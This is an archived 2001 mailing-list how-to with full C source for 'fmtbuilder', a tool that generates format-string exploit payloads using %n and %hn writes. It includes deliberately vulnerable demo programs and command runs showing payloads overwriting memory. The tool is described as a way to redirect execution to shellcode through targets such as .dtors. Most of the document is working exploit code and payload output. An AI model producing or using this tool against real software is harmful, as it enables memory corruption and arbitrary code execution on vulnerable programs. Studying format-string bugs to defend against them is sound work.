FMTBUILDER-Howto version 0.1 ---------------------------------------------------------------- Frederic "Pappy" Raynal <frederic.raynalat_private> Samuel "Zorgon" Dralet <samuel.draletat_private> ---------------------------------------------------------------- Date: 08/03/01 [ Contents ] 1. Introduction 2. Usage 3. Example 4. Notations and goals 5. Solution 6. %n way 7. %hn way 8. What if some text is placed before the format string 9. Alignment 10. Example: base and alignment 11. Greetings 12. References 13. Appendix ---------------------------------------------------------------- -------{ 1. Introduction This document focuses on building format strings to exploit format bugs. The reader is supposed to know what they are and howto exploit tham, which won't be remind here. fmtbuider is a small program that aim at building format strings. In this document, we explain the methods and tricks used to achieve this goal. -------{ 2. Usage Usage : ./fmtbuilder [-nh] -a <locaddr> -v <retaddr> -o <offset> -a <locaddr> : <locaddr> is the address to overwrite ( .dtors for instance ) -r <retaddr> : <retaddr> is the address where we expect to return, for instance because a shellcode is waiting for us ;) -o <offset> : distance (in words) to reach the beginning of our buffer (i.e. used with the $ format - see printf(3) ) -b <base> : <base> is the amount of char placed before the our own part of the format string. Two building methods, each with its own pros and cons, are available: -n : Format string with %n -h : Format string with %hn -------{ 3. Example For our educational purpose, we need a very easy vulnerable program: /* formatme1.c */ int main( int argc, char ** argv ) { int bar; int foo = 0x41414141; char fmt[128]; memset( fmt, 0, sizeof(fmt) ); printf( "foo at 0x%x\n", &foo ); printf( "argv[1] = [%s] (%d)\n", argv[1], strlen(argv[1]) ); snprintf( fmt, sizeof(fmt), argv[1] ); printf( "fmt=[%s] (%d)\n", fmt, strlen(fmt) ); printf( "foo=0x%x\n", foo ); } Our goal is to change the value of foo to 0x0430201. So, we just need to discover the offset to the beginning of our buffer: $ gcc -o formatme1 formatme1.c $ ./formatme1 BBBB%2$\x foo at 0xbffff8f8 argv[1] = [BBBB%2$x] (8) fmt=[BBBB42424242] (12) foo=0x41414141 et hop : it is 2 :) Since our program gives the address of "foo", we just have to run it: $ ./formatme1 `./fmtbuilder -r 0x04030201 -a 0xbffff8f8 -b 0 -o 2 -n` Format string builder [ align = 0 ] [ str = øøÿ¿ùøÿ¿úøÿ¿ûøÿ¿%241x%2$n%257x%3$n%257x%4$n%257x%5$n] (52) foo at 0xbffff8d8 argv[1] = [øøÿ¿ùøÿ¿úøÿ¿ûøÿ¿%241x%2$n%257x%3$n%257x%4$n%257x%5$n] (52) fmt=[øøÿ¿ùøÿ¿úøÿ¿ûøÿ¿ ] (127) foo=0x41414141 Ok, this first run never works because the position of foo changes when a long string is pt in the stack. But the right address is displayed by our nice program (foo at 0xbffff8d8): $ ./formatme1 `./fmtbuilder -r 0x04030201 -a 0xbffff8d8 -b 0 -o 2 -n` Format string builder [ align = 0 ] [ str = Øøÿ¿Ùøÿ¿Úøÿ¿Ûøÿ¿%241x%2$n%257x%3$n%257x%4$n%257x%5$n ] (52) foo at 0xbffff8d8 argv[1] = [Øøÿ¿Ùøÿ¿Úøÿ¿Ûøÿ¿%241x%2$n%257x%3$n%257x%4$n%257x%5$n] (52) fmt=[Øøÿ¿Ùøÿ¿Úøÿ¿Ûøÿ¿ ] (127) foo=0x4030201 And with the %hn (just the last option and the address of foo to change): $ ./formatme1 `./fmtbuilder -r 0x04030201 -a 0xbffff8e8 -b 0 -o 2 -h` Format string builder [ align = 0 ] [ str = èøÿ¿êøÿ¿%.66041x%2$n%.66050x%3$hn ] (33) foo at 0xbffff8e8 argv[1] = [èøÿ¿êøÿ¿%.66041x%2$n%.66050x%3$hn] (33) fmt=[èøÿ¿êøÿ¿00000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000] (127) foo=0x4030201 -------{ 4. Notations and goals a 32-bits address is noted [b3 b2 b1 b0] where : - b0 = ( addr >> 24 ) & 0xff; - b1 = ( addr >> 16 ) & 0xff; - b2 = ( addr >> 8 ) & 0xff; - b3 = ( addr ) & 0xff; Suppose we wants to write x0 to b0, x1 to b1... (where xi is an unsigned char in { 0...255 }). Independently from the method used to write (%n or %hn), since %n is strictly increasing, troubles occur as soon as we don't have x3 < x2 < x1 < x0 which is almost always the case ;( One needs a trick ... and (can you hear the drums rolls;) here it comes : the solution is always to force that inequality to be true ! Yes, it seems incredible, isn't it ;))) -------{ 5. Solution A simple but inefficient solution would be to sort each of the xi, but that leads to a very painful algorithm since there is 4! = 4 * 3 * 2 * 1 = 24 available permutations (and thus as much "special cases" to handle) We said that the xi's are in { 0...255 } ... but we are going to put them in { 256...511 }, by simply adding 256 to each value. And so, one byte is no more enough to hold the value, but that is really no matter since we are going to use several writings: for one writing, we are only interested in the last of the 2 bytes, the next writing erasing the other (garbage) byte. [ Example ] Let's x3 = 0x44, x2 = 0x33, x1 = 0x0f and x0 = 0x01 One wants to put in memory [ 0x44 0x33 0x02 0x01 ] ... but unfortunately, 0x44 > 0x33 Nevertheless, 0x44 < 0x0133 :) <- Here is the solution :) Rather than writing the expected value at a given position, one has to consider this value plus 0x0100. Since the value to write is in { 0...255 }, the written one will be in { 0...255 } + 0x0100 = { 256...511 } and is now coded with 2 bytes. |---------------------------|------------------------|---------------------| | bytes | total | retaddr | |---------------------------|------------------------|---------------------| | 0x44+0x0100 = 0x0144 | 0x0144 | 0x44 0x01 X X | | 0x33+0x0100-0x44 = 0x00ef | 0x0144+0x00ef = 0x0233 | 0x44 0x33 0x02 X | | 0x0f+0x0100-0x33 = 0x00dc | 0x0203+0x00dc = 0x030f | 0x44 0x33 0x0f 0x03 | | 0x01+0x0100-0x0f = 0x00f2 | 0x030f+0x00f2 = 0x0401 | 0x44 0x33 0x0f 0x01 | |---------------------------|------------------------|---------------------| ( X = undefined ) As you can notice in the above table, the "garbage byte" always increases and that is what ensures the inequality to be always true. -------{ 6. %n way The format string is built using 4 consecutive writings %n, (almost) as described in Kalou's article (see the references). The only difference is the use of the previous trick, which really makes life easier ;) pros: - sometimes, format bugs are also overflow: int main( int argc, char ** argv ) { char buf[64]; sprintf( buf, argv[1] ); } Trying to exploit this with %hn will lead to an overflow: the string formatted by argv[1] will expand but since no check is done, it will overflow the buffer and coredump. cons: - the string is longer than with the %hn: one needs the 4 %x, one for each %n - can overwrite something that is no more in the format string: as shown in the example, writing with %n gets out of bounds. This could become annoying if it changes the value of something important: + a variable (or a pointer): int i = 0; char fmt[64]; ... printf(fmt); + the saved %ebp: void foo() { char fmt[64]; ... printf(fmt); -------{ 7. %hn way In a previous article about format bugs, I introduced another solution to build the format string using %hn. This solves the cons of the %n approach : - the string is shorter since you just need 2 %x before the %hn - you don't overwrite anything after the format string since you write only 2 short int (2 bytes each) Unfortunately, the %hn approach has to face the same problem as with %n: the count is strictly increasing ... but almost the same solution allows to solve that ;) In the article, I used a format string looking like that : %[val1]x%[val2]x%[offset]hn%[offset+2]hn Now, rather than using 2 %hn, we use firstly a %n and then a %hn. The first %n writes to all the retaddr, even if only the last 2 bytes are interesting (i.e. the ones we expect). Then, the %hn overwrite those 2 "garbage" bytes with the exact value, without overflowing after the address. With the %n technique, the values are in { 0...255 }. Since we now use 2 bytes, they are now in { 0...255 * 255 }. So, to be greater than the previous written value, adding 0x0100 is no more enough, so we add 0x0100 * 0x0100 = 0x010000 instead. [ Example ] We still consider the same values as in the previous example. The first short we have to write is the low part : 0x4433 but unfortunately, 0x4433 > 0x0f01 Nevertheless, 0x4433 < 0x010f01. Rather than writing the expected value at a given position, one has to consider this value plus 0x010000. Since the value to write is in { 0...65535 }, the written one will be in { 0...65535 } + 0x010000 = { 65536...131071 } and is now coded with 3 bytes (ok, 4... but the last one will be zero) |-----------------------------|------------------------|---------------------| | bytes | total | retaddr | |-----------------------------|------------------------|---------------------| |0x4433+0x010000=0x014433 | 0x014433 | 0x44 0x33 0x01 X | |0x0f01+0x010000-0x4433=0xcace|0x014433+0xcace=0x020f01| 0x44 0x33 0x0f 0x01 | |-----------------------------|------------------------|---------------------| The second writing is truncated because of the %hn: it cast the value to a short int and hence keeps only the last two bytes, which are exactly what we want. -------{ 8. What if some text is placed before the format string That's no big deal ;) If you look in the sources (always look in the source, Luke;) you will notice that having some character before the format string or not makes almost no difference. What is done to handle values xi smaller than the previous ones (i.e. adding 0x0100 - 0x010000 - to this value) is also usable to handle what we call the "base" (these first char) : we also add 0x0100 (or 0x010000) to the very first value to be sure that our last char will be the one we expect. 3 situations are possible: 1. base < x3 : we just have to write x3-base in our format 2. base == x3 : idem 3. base > x3 : x3 has to be increased to exceed "base" But since adding 0x0100 (0x010000) doesn't change our target byte(s), we can continue that way. So, we have to add ( base / 0x0100 ) + 1 (resp. (base / 0x010000) + 1) to x3 to be greater than "base". [ Example ] Take base = 0x0224 (548) (yes, I know, that will never be like that... it is just to show that our algo is not so bad ;) and x3 = 0x44. Using the %n approach, adding only 0x0100 is not enough ( 0x0100 + 0x44 = 0x0144 < 0x0224 ) So, we have to add 0x0100 until we are greater than 0x0224 ... which is exactly given by ( 0x0224 / 0x0100 + 1 = 3 ). Finally, the first writing is : 0x44 + 3 * 0x0100 - 0x0224 = 0x0120 Like that, we have written 0x120 + 0x0224 = 0x0344 char for our first %n: as you can see, the last byte is the one expected :) -------{ 9. Alignment When dealing with buffer overflows, one has to take care about the alignment in memory. With format bugs, this is almost never useful :) The string used as format string is aligned in memory. The only thing that could break that occurs when some char are already in the string that is going to be exploited. For instance, if the string contains "Alert" before being submitted to our will, one will have to add 3 char just after so that the length is multiple of 4, and thus aligned in memory : "AlertXXX". We call "base" the length of those char previously in the string. More generally, one just have to add ( 4 - base%4 ) (% means modulo) to base to have a string that is well aligned. A great care has to be taken when alignment in non-zero to discover the offset. One can not expect anymore to retrieve his "marker" in a full word. See the following example for further details. -------{ 10. Example: base and alignment /* formatme2.c */ int main( int argc, char **argv ) { int bar; int foo = 0x41414141; char buffer[1024]; snprintf( buffer, sizeof(buffer), "%s%s", argv[1], argv[2] ); printf( "foo is at 0x%x\n", &foo ); printf( buffer ); printf( "\nfoo=0x%x\n", foo ); } We will use an unaligned input string "ABCDE", so we start by guessing the offset: $ ./formatme2 ABCDE BBBB%5\$x foo is at 0xbffff7c8 ABCDEBBBB42424245 foo=0x41414141 $ ./formatme2 ABCDE BBBB%6\$x foo is at 0xbffff7c8 ABCDEBBBB24362542 foo=0x41414141 We retrieve our BBBB across both offsets 5 and 6. Since we are going to add char to align the buffer, we have to use the upper one (6): $ ./formatme2 ABCDE `./fmtbuilder -r 0x04030201 -a 0xbffff798 -b 5 -o 6 -n` Format string builder [ align = 3 ] [ str = ÷ÿ¿÷ÿ¿÷ÿ¿÷ÿ¿%233x%6$n%257x%7$n%257x%8$n%257x%9$n ] (52) foo is at 0xbffff798 ABCDEFGXXX÷ÿ¿÷ÿ¿÷ÿ¿÷ÿ¿ ... bffff798 ... 4015e000 ... bffff74c ... 44434241 foo=0x4030201 Great :) $ ./formatme2 ABCDE `./fmtbuilder -r 0x04030201 -a 0xbffff7a8 -b 5 -o 6 -h` Format string builder [ align = 3 ] [ str = ÷ÿ¿ª÷ÿ¿%.66033x%6$n%.66050x%7$hn ] (33) foo is at 0xbffff7a8 ABCDEXXX¨÷ÿ¿ª÷ÿ¿00000000000000000000000000000000000000000000000 ... ... ... ... ... 00000000000000000000000000000000000000000000000000000004015e000 foo=0x4030201 Still fine :) Lines full of 0 are cut. -------{ 11. Greetings To Christophe "Korty" Bailleux for having submitted to us the problem of automatic format string builder and all his comments. -------{ 12. References How to learn more about format strings ? [1] "More info on format bugs" Pascal "kalou" Bouchareine <pbat_private> [2] "Format Bugs: What are they, Where did they come from,... How to exploit them " Lamagra <lamagraat_private> [3] "Avoiding security holes when developing an application - 4: Format strings" Frederic "pappy" Raynal <frederic.raynalat_private> Christophe Grenier <cgr@global-secure.fr> Christophe Blaess <ccb@club-internet.fr> -------{ 13. Appendix /* * Copyright (C) 2001 Frederic "Pappy" Raynal <frederic.raynalat_private> * Copyright (C) 2001 Samuel "Zorgon" Dralet <samuel.draletat_private> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or (at * your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 * USA * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define ADD 0x100 #define OCT( b0, b1, b2, b3, addr ) { \ b0 = (addr >> 24) & 0xff; \ b1 = (addr >> 16) & 0xff; \ b2 = (addr >> 8) & 0xff; \ b3 = (addr ) & 0xff; \ } void usage (char * cmd ) { fprintf(stderr, "------------------------------------------------------------ ----\n"); fprintf( stderr, " Format string builder\n" ); fprintf(stderr, " Frederic \"Pappy\" Raynal <frederic.raynalat_private> \n"); fprintf(stderr, " Samuel \"Zorgon\" Dralet <samuel.draletat_private r>\n"); fprintf(stderr, "------------------------------------------------------------ ----\n"); fprintf( stderr, "\n" ); fprintf( stderr, "Usage : %s [-nh] -a <locaddr> -v <retaddr> -o <offset>\n", cmd ); fprintf( stderr, " -n :\tFormat string with %%n\n"); fprintf( stderr, " -h :\tFormat string with %%hn\n"); fprintf( stderr, " -a <locaddr> : address to overwrite (like .dtors)\n"); fprintf( stderr, " -r <retaddr> : where we want to return (shellcode)\n" ); fprintf( stderr, " -o <offset> : distance in 'words' to reach the part of the buffer we control\n" ); fprintf( stderr, " -b <base> : amount of char previously in the string\n\n" ); fprintf( stderr, "E.g: %s -n -a 0x080495e8 -r 0x01020304 -o 4 -b 0\n\n", cmd ); fprintf( stderr, "[EOF]\n\n" ); } char * build_un( unsigned int retaddr, unsigned int offset, unsigned int base ) { char * buf; /* on calcule ou on laisse comme ca */ unsigned int length = 128; unsigned char b0, b1, b2, b3; int start = ((base / ADD) + 1)*ADD; fprintf(stderr, "start=%d\n", start); OCT( b0, b1, b2, b3, retaddr ); if ( !(buf = (char *)malloc(length * sizeof(char))) ) { fprintf( stderr, "Can't allocate buffer (%d)\n", length ); exit( -1 ); } memset( buf, 0, length ); snprintf( buf, length, "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n", b3 - (sizeof( size_t ) * 4) + start - base, offset, b2 - b3 + start, offset + 1, b1 - b2 + start, offset + 2, b0 - b1 + start, offset + 3 ); return buf; } char * build_hn( unsigned int retaddr, unsigned int offset, unsigned int base ) { unsigned int length; unsigned int high, low; char * buf; int start = ((base / (ADD*ADD)) + 1)*ADD*ADD; high = ( retaddr & 0xffff0000 ) >> 16; low = retaddr & 0x0000ffff; /* Certainement a recalculer ou egale a 128*/ length = ( sizeof( offset ) * 2 ) + sizeof( high ) + sizeof( low ) + 15; if ( !(buf = (char *)malloc(length * sizeof(char))) ) { fprintf( stderr, "Can't allocate buffer (%d)\n", length ); exit( -1 ); } memset( buf, 0, length ); snprintf( buf, length, "%%.%hdx%%%d$n%%.%hdx%%%d$hn", low - ( sizeof( size_t ) * 2 ) + start - base, offset, high - low + start, offset+1 ); return buf; } int main( int argc, char * argv[] ) { char opt; char * fmt; char * endian; /* la partie de la chaine contenant les adresses à écraser */ unsigned long locaddr, retaddr; unsigned int offset, base, align = 0; unsigned char b0, b1, b2, b3; int length, ch; if ( argc != 10 ) { usage( argv[0] ); exit( -1 ); } length = ( sizeof( size_t ) * 16 ) + 1; if ( !(endian = (char *)malloc(length * sizeof(char))) ) { fprintf( stderr, "Can't allocate buffer (%d)\n", length ); exit( -1 ); } memset( endian, 0, length ); while ( (opt = getopt( argc, argv, "nha:r:o:b:" )) != EOF ) switch( opt ) { case 'n': ch = 0; break; case 'h': ch = 1; break; case 'a': locaddr = strtoul( optarg, NULL, 16 ); break; case 'r': retaddr = strtoul( optarg, NULL, 16 ); break; case 'o': offset = atoi( optarg ); break; case 'b': base = atoi( optarg ); break; default: usage(argv[0]); exit( -1 ); } OCT( b0, b1, b2, b3, locaddr ); if ( base%4 ) { align = 4 - ( base%4 ); base += align; } if ( ch == 0 ) { snprintf( endian, length, "%c%c%c%c" "%c%c%c%c" "%c%c%c%c" "%c%c%c%c", b3, b2, b1, b0, b3 + 1, b2, b1, b0, b3 + 2, b2, b1, b0, b3 + 3, b2, b1, b0 ); fmt = build_un( retaddr, offset, base ); } else { snprintf( endian, length, "%c%c%c%c" "%c%c%c%c", b3, b2, b1, b0, b3 + 2, b2, b1, b0 ); fmt = build_hn( retaddr, offset, base ); } fprintf(stderr, "align=%d\n", align); fprintf( stderr, "str=[%s%s] (%d)", endian, fmt, strlen(endian)+strlen(fmt) ); for( ; align>0; --align) printf("X"); printf( "%s%s", endian, fmt ); fprintf(stderr, "\n"); return( 0 ); } ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Sun Aug 05 2001 - 10:01:18 PDT